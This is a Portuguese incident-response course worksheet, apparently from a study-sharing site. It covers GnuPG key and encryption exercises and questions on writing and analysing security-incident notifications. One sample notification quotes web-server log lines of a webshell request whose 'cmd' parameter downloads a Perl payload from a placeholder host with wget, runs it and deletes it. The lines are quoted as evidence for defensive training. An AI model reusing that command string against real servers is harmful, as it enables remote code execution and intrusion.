Aspectos Operacionais da Resposta de Incidentes

•

UNIDERP - ANHANGUERA

2

0

2

0

Vinícius da Silva

21/12/2022

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Faça como milhares de estudantes: teste grátis o Passei Direto

Esse e outros conteúdos desbloqueados

16 milhões de materiais de várias disciplinas

Impressão de materiais

Agora você pode testar o

Passei Direto grátis

Você também pode ser Premium ajudando estudantes

Você viu 3, do total de 3 páginas

E aí, curtiu este material?

Ajude a incentivar outros estudantes a melhorar o conteúdo

Gostou desse material? Compartilhe! 🧡

Gestão de Segurança da Informação

13.666 Materiais compartilhados

Baixe o app para aproveitar ainda mais

Leia os materiais offline, sem usar a internet. Além de vários outros recursos!

Prévia do material em texto

16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes
file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 1/3
Sessão 5: Aspectos Operacionais da Resposta de Incidentes
1. Atividade – Utilizando PGP
A utilização de criptografia, conforme comentado, é altamente recomendável e muitas vezes mandatória para a troca
de informações de incidentes de segurança. Nesta atividade vamos usar o software GNUPG para realizar tarefas
básicas:
Criar uma chave PGP para ser utilizada no seu CSIRT.
1. O processo de criação de chaves é totalmente interativo, para iniciá-lo, utilize o comando:
# gpg --gen-key
2. As chaves são criadas no diretório “~/.gnupg/”. Para listar as chaves, utilize o comando a seguir:
# gpg --list-keys
Criar um arquivo com um conteúdo qualquer:
# echo 'Ola Mundo' > arquivo.txt
Veja que foi criado um arquivo contendo a assinatura arquivo.txt.asc
3. Assinar um arquivo:
# gpg -s --clearsign arquivo.txt
4. Criptografando um arquivo:
# gpg --encrypt arquivo.txt
Na pergunta Enter the user ID. informe o email utilizado durante o processo de geração das chaves.
Neste caso o arquivo será criptografado utilizando a sua chave pública portanto apenas sua chave privada
poderá visualizar o conteúdo
5. Exportar a sua chave pública para um arquivo (obs.: substitua csirt@csirt.com pelo email utilizando durante o
processo de geração das chaves):
# gpg --export -a csirt@csirt.com >chave-publica_CSIRT_A.txt
6. Importar uma chave pública de outro aluno (você deve combinar com outro aluno a forma como rá receber a
chave pública):
# gpg --import chave-publica_CSIRT_X.txt 
# gpg --list-keys
7. Importar a chave pública do CERT.br:
# wget http://www.cert.br/pgp/CERTbr.asc ; gpg -import CERTbr.asc 
# gpg --import CERTbr.asc 
# gpg --list-keys
16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes
file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 2/3
8. Cifrar um arquivo com a chave pública importada (você deve substituir o valor ID_CSIRT_X pelo email do CERTBr
constante no certificado. Esta informação pode ser visualizada com o comando gpg --list-keys e,
provavelmente, será cert@cert.br ):
# gpg -r ID_CSIRT_X --encrypt arquivo.txt
2. Atividade – Noti�cação de incidentes
Quais seriam as vantagens e desvantagens de notificar um incidente de segurança utilizando as duas linhas de logs a
seguir:
Log A: 
2013-09-30 22:07:28 PST 20.20.20.20/2231-> xxx.xxx.xxx.xxx/22
Log B: 
2013-09-30 22:07:28 PST 20.20.20.20/2231-> 30.30.30.30/22
Comentários:
3. Atividade – Identi�car informações relevantes em uma noti�cação recebida
Avalie a notificação de incidente a seguir e responda os possíveis desmembramentos do incidente. Para isso, considere
a sua abrangência operacional:
Você representará a “universidade.exp.net.br”;
Seu bloco de endereçamento é: 192.168.0.0/24
From: csirt@universidade.exp.net.br 
To: csirt@esr.rnp.br 
Subject: Ataque ao servidor web 
 
Senhores, 
 
Detectamos através de nossos sistemas de segurança que uma máquina de sua responsabilidade está buscando 
vulnerabilidades no nosso servidor web. Solicitamos que investigue o incidente a seguir e tome as medidas 
cabíveis. 
 
10.10.10.10 - - [14/Nov/2014:08:50:43 -0200] “GET +/forum2013/slides//images/docs/morocanz.php?
cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20 perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1” 404 
7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” 
 
10.10.10.10 - - [14/Nov/2014:12:57:19 -0200] “GET /docs/papers/hnbr-first2003.pdf//images/docs/morocanz.php?rf 
HTTP/1.1” 404 7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” 
 
10.10.10.10 - - [14/Nov/2014:12:57:20 -0200] “GET +/docs/papers//images/docs/morocanz.php?
cmd=cd%20/tmp%20;wget%20http://website.com.xxx/p.log%20;%20 perl%20p.log%20;%20rm%20-rf%20p.log HTTP/1.1” 404 
7488 “Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.1” 
 
Atenciosamente,
 
CSIRT
Faça um resumo do incidente a seguir descrevendo o ataque.
mailto:csirt@universidade.exp.net.br
mailto:csirt@esr.rnp.br
16/05/2022 16:04 Sessão 5: Aspectos Operacionais da Resposta de Incidentes
file:///D:/projetos/esr/esr-seg4/html/_cadernos/seg4_caderno_s5.html 3/3
O incidente foi bem-sucedido? O atacante teve sucesso na sua investida? Por quê?
Esse incidente vai gerar uma notificação externa?

ENTREGA DA TAREFA
Para que seja considerada entregue você deve anexar a esta atividade no AVA um arquivo
texto contendo a respostas de todas as perguntas realizadas ao longo desta tarefa.
Última atualização 2022-05-16 16:02:03 -0300